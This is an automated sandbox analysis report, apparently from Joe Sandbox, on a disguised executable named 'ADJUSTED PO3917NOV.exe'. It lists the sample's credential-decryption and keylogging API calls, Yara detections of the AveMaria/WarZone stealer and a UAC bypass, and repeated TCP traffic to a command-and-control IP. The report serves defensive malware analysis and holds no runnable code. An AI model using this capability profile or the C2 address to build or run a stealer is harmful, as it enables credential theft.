Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_0040CAFC CryptUnprotectData,LocalAlloc,LocalFree,	4_2_0040CAFC
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_0040CC54 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,	4_2_0040CC54
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_0040CCB4 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,	4_2_0040CCB4
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_0040A6C8 GetBinaryTypeW,CopyFileW,CryptReleaseContext,PathFileExistsW,GetPrivateProfileStringW,	4_2_0040A6C8
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_0040B15E lstrlenA,CryptStringToBinaryA,lstrcpyA,	4_2_0040B15E
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_2_0040A632 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,	4_2_0040A632

Exploits:

Yara detected UACMe UAC Bypass tool

Show sources

Source: Yara match	File source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.312c090.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.ADJUSTED PO3917NOV.exe.15a17b8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.ADJUSTED PO3917NOV.exe.15a17b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.327615222.000000000159F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319990653.000000000054F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.321513614.000000000054F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327551592.000000000159F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.554723844.000000000054F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.318229472.000000000054F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319416601.000000000054F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ADJUSTED PO3917NOV.exe PID: 5404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ADJUSTED PO3917NOV.exe PID: 1328, type: MEMORYSTR

Source: ADJUSTED PO3917NOV.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source: ADJUSTED PO3917NOV.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: ADJUSTED PO3917NOV.exe
Source:	Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: ADJUSTED PO3917NOV.exe, 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_0041002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

4_2_0041002B

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_00409DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,

4_2_00409DF6

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: 185.222.57.253

Source: Joe Sandbox View

ASN Name: ROOTLAYERNETNL ROOTLAYERNETNL

Source: global traffic

TCP traffic: 192.168.2.3:49741 -> 185.222.57.253:4782

Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.290529303.0000000005D26000.00000004.00000001.sdmp	String found in binary or memory: http://en.w
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.292156707.0000000005D27000.00000004.00000001.sdmp, ADJUSTED PO3917NOV.exe, 00000000.00000003.292198894.0000000005D27000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.300689225.0000000005D27000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.296145703.0000000005D2C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com.TTF
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp, ADJUSTED PO3917NOV.exe, 00000000.00000003.300380444.0000000005D28000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.295942171.0000000005D2D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.300380444.0000000005D28000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersB
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.296145703.0000000005D2C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com;
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.295910728.0000000005D2C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comF
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.296259109.0000000005D2E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comM.TTF
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.300689225.0000000005D27000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comceva
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.295910728.0000000005D2C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comde
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.297131061.0000000005D2C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comdl
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.295942171.0000000005D2D000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comitudl
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.295910728.0000000005D2C000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comivaI
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.300689225.0000000005D27000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.como
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.291737235.0000000005D28000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.291797697.0000000005D27000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn#
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.291737235.0000000005D28000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnpor
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.291687095.0000000005D27000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnr(
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.292846609.0000000005D2B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.293647148.0000000005D2D000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/;
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.292846609.0000000005D2B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/I
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.292846609.0000000005D2B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Stan
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.292846609.0000000005D2B000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/dz
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.293647148.0000000005D2D000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/l
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.293647148.0000000005D2D000.00000004.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/s
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.291966655.0000000005D3B000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com#
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.291966655.0000000005D3B000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comB
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.291966655.0000000005D3B000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comeL
Source: ADJUSTED PO3917NOV.exe, 00000000.00000003.291966655.0000000005D3B000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comt
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ADJUSTED PO3917NOV.exe	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, ADJUSTED PO3917NOV.exe, 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_0040562F setsockopt,recv,recv,

4_2_0040562F

Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.57.253

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe

Code function: 4_2_004089D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,

4_2_004089D5

Source: ADJUSTED PO3917NOV.exe, 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp

Binary or memory string: GetRawInputData

E-Banking Fraud:

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.3fccb60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.327703338.00000000015C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327531363.00000000015CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327638100.00000000015C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327579370.00000000015B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327676957.00000000015CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327479352.00000000015A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.5.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.ADJUSTED PO3917NOV.exe.312c090.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.15.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.3.ADJUSTED PO3917NOV.exe.15a0220.2.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 4.3.ADJUSTED PO3917NOV.exe.15a17b8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Author: unknown
Source: 4.3.ADJUSTED PO3917NOV.exe.15a17b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
